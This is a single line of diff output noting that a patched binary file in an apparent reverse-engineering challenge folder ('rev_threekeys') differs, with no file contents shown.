b/LaokoonHaxorcist/rev_threekeys/threekeys.patched differ